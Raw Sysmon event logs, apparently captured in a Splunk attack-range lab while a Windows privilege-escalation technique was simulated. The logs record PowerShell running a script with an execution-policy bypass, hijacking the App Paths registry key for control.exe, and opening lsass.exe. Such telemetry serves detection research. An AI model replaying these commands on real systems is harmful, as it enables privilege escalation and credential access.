08:02:29.599{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001052618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.588{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\sd1.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001052617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:29.215{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96BA7682DC4FBF0BF48B6CE617B3117D,SHA256=F987450E936D0FFA582DC5A87BEA3C79F621FC1E1A58C0096C301826A215F0CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809458Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:29.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FF457B774AED09315144F7412D44AB2,SHA256=E0C1BC4F8F74351C6BC3DCBF290334BAAFB014ED71EE1217090025166C88A553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809457Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:29.114{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8A1849A1A36E22286B62037D5E7B16,SHA256=36E81259A5E6461CDE400F381C08F7EE3AC281131276B9C51FF81A0962C74C2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:30.177{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F8EFB9B8438F16DE5BCCE48D8EAE4E69,SHA256=CD2D0131FE65D49A5A5EC6C4F250ED8DFBEDCBC359C4BB61064EC9CAA0D8D550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809459Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:30.130{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DB05DF0D1B4FBDE37630899880519D,SHA256=F517664F85E3BFD9E4B1CFC26187A432A869738AE777F04073ABB590330E71D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6813271A29A447DA064B4BC446395481,SHA256=8A471CAE38D40FF5F5F6A0F01F1CBF34E111BE7BE12038E218DE4783C122CD90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.685{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5563E9C70ADE9B62823D0F52A1F504E2,SHA256=5A4EBE58B56972E35F396039CF0960F370A2791B99DC5E35ABD8BF161DBD02A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:30.684{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8639E78E5E0FBCEF6C21EC5A26524F14,SHA256=4B2E7632D66C17C9963FC2F229DEFDD05CCD078FA9CF82BED883FA5434D1CD1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.683{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBCE7A165DD6049D1020E949B080B33B,SHA256=D011F27A080C08309E520A6C89DB6DC096F39A518F229D61C40BC3A69DDE598D,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:02:30.302{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe\(Default)c:\temp\procexp64.exe 10341000x80000000000000001052663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:30.000{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:30.000{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F715-60EB-B77D-00000000CF01}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x8000000000000000809461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:31.146{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA1CCE13BC728ED7FC4DE2B30DAB137,SHA256=92E98B4127716A9BBAD234BD477CE63CF460BE9B9D9B24FA1751C01DE3F28796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:31.304{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B8ACE3A73C2C2355AD5DB56CA27F18E,SHA256=68526EC4F560AAB08C4A60B0BF96BC090275BC9CA4B55DDC5855A94F4F9CAD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:32.835{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A2D20EF768FB2C07C3C74310B079A85C,SHA256=46EDC1AD2E434E37016C0E699297125EA5FC2FAE93671EFB66C59E82FA8503A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:32.835{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7BADD8F163132B258AE63E3DF093E46F,SHA256=30EB2C5A9BD37A0AEABADE0414FC451AB869687AFE81B7B1FA5ACD8508DFD7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:32.319{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BBEF30ACB159D0EA745AC0F60BE9591,SHA256=2E34C264A13FD00AA537F63CB07A34B530A8B8225569CB9FE305B8A09F14B2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:32.192{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7819EB52C53B790C28DB412F991B122,SHA256=998507D1E607E2878BFA35F1609ECF8543AD1905BF47E9C9DA95EAD6DC4CD984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:33.404{466BC892-F715-60EB-B77D-00000000CF01}4796ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:33.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2B914B97F846BD8E0DE165D30976E4C,SHA256=AFCE5D15B9E0AAF2052EA89D7ADA90C9F1838263A760806AD3887CE9C9A27780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:33.224{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0C15142287280A78D324BF180BF201,SHA256=53B2E73F6DFE8CA32203F7FCD179D83E9EA1D08A1E63ECF417D467E700750DD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:31.278{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57396-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:34.403{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BF36CBF8A17A5E2C8436A192500074A7,SHA256=BF74DC0EF5326992B01DED04722EE73311E0B9B3621AE8837852B1ECA3438086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:34.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF89EB9EF3B8B4B5A3A2460D382F063,SHA256=12CA8DD164B8900B188996A5221E582C1D7D040E1654A3B7EBC08D36A304E819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:34.224{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9926A327B682683444EE1C258CA7151,SHA256=ADF60C12925F3280A592CE920502193ACFD87C6070C0D3E6747D13A09BA8D278,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:26.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51173-false10.0.1.12-8000- 23542300x8000000000000000809466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:35.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2C3DFBCB393620486A38C626AA81668,SHA256=21A3314FF4821BCC8A90B15A391106DA529EC27A78B5B09082B42FBFCF9DA064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:35.366{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07A008A1FF5BDE7B6B8DD42747BAABE0,SHA256=FE99AECE18308C170614FA2AD85529469133B46A8EA6D5740B93E9B9098BE180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:36.385{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B469FEFE9086545025E4673A363F8F8,SHA256=2F2D9BD7187775448687CC955F4E9E686F18EDFEC9547090FBF09BBC71DE3A3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:36.251{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4AC1FE8E6F591DAC6E19CA824E1466B,SHA256=9C6449A771363B845AC624320674B5D41420E414F1BBB1E1113D487C6C778556,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.950{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F71D-60EB-B97D-00000000CF01}7440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+517
81 10341000x80000000000000001052716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:37.887{466BC892-F71D-60EB-B97D-00000000CF01}74402392C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
